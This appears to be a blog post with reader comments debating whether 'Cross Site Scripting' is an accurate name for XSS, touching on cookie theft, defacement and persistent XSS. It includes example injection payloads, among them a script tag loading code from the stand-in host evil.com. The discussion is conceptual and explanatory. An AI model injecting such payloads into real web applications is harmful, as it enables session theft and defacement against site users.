Just a hint: For some people the following blog entry can look like absolute nonsense 
Some time ago a working colleague of mine asked my, why Cross Site Scripting is called this way because all he’s seen about it was to inject some own script in a web application but where is the “Cross Site” here? He said, that from his point of view there’s an HTML or script injection vulnerability but it doesn’t make any sense to call this a XSS.
OK, then I had to answer and I’ve to say that in many cases he’s absolutely right and many things we call a XSS today isn’t really one. I can say that if you’re using something like <script xsrc=”http://evil.com/script.js”> this is from another site and so it’s a XSS but stop, when we can do that, most of the time we’re also able to inject something like <script>alert(123);</script> and here it’s not really “cross site” because the script is directly in the HTML code of the vulnerable web application. When we look at this we have to say, that we have to name the type of vulnerability by the way someone exploits it and this doesn’t make sense at all.
Now I had to find a way to define this for myself so that I can sleep well at night again. First thing is, that XSS is an injection attack every time and nothing else but for me not the “cross” is the problem, for me the “site” makes no sense. Think about a normal temporary XSS which’s launched over Javascript in the URL here we have the cross from the URL input box of the browser into a new context, which’s the vulnerable web application but the source of the attack is not another site so to answer my colleagues question is very easy but I’ve got a much more difficult question now: Why is there a “site” in XSS?
It would for example be much more correct if we call it XSA for Cross Scripting Attack but this term is already used by Cross Site Authentication, even if nobody uses this kind of attack as far as I know.
So for me the conclusion is, that XSS is not a perfect term for the kind of attack we call this way because for me it doesn’t seems to be correct but all the people out there and also myself will call it XSS out of habit also in the future and so we don’t have to change anything, even if we know that there’s only one side and not two for getting a cross.
PS: Webbased worms are for this blog posting absolutely out of scope but of course there you can have “real” XSS 
Hey,
The XSS naming issue was raised several times before
Take a look at the Wikipedia XSS page:
http://en.wikipedia.org/wiki/Cross_site_scripting
“This issue isn’t just about scripting, and there isn’t necessarily anything cross-site about it. So why the name? It was coined earlier on when the problem was less understood, and it stuck. Believe me, we have had more important things to do than think of a better name.” (XSS pioneer Marc Slemko)
I didn’t see that before but it’s funny that other people asked the question about the name too, thanks for it
PS: And of course Marc Slemko is right when he says “Believe me, we have had more important things to do than think of a better name.”
Btw, I think that if you think about the attack and not the vulnerabilities, you have to have the “cross site”
Hi nEUrOO,
why do you think that? For example a temporary XSS which you can exploit over a normal URL GET request, doesn’t need another site for example to get cookies or something else. I think your point is, that after an attack like this you have to send the victim to another site or at least some of his data to have a complete attack and here you’re right but then we still have attack scenarios like site defacements through XSS and here you don’t have any other site which is involved. So I think normally an attacker will need at least one other site for doing a real attack most of the time but still “cross site scripting” is from my point of view not the term which matches exactly to what a XSS attack does but I’m interested in your point of view
Hum, you’re right for the defacement with XSS, but I really used not to consider this as a “real-important-whatever” attack; I mean… Well, at least as far as I know, you cannot totally deface a website with XSS (i mean only XSS, not db storage etc. beside) but only modifying your local view of the page which may be able to see with a link (phishing).
That’s why I consider that the important attacks at least need an other site to store scripts (worm), to send data (stealing information) etc.
Maybe I missed something for the defacement thus I am waiting for your answer
I don’t agree with “you cannot totally deface a website with XSS” because with Javascript, we can access the DOM tree and so we can modify all the elements on a website or to make it extremely simple, we can just use innerHTML for rewriting the whole site content and of course you can also do permanent XSSing and at least then really nasty things can going on, for example if you modify the text of a political site during general elections or stuff like this
But of course I fully agree with you that most of the time as I already wrote in my last comment, you’ll need a second site for doing serious attacks but from my point of view it’s nonsense if we call one attack different every time after the way it’s exploited.
You’re absolutely right for the permanent xss, i didn’t even think about it :X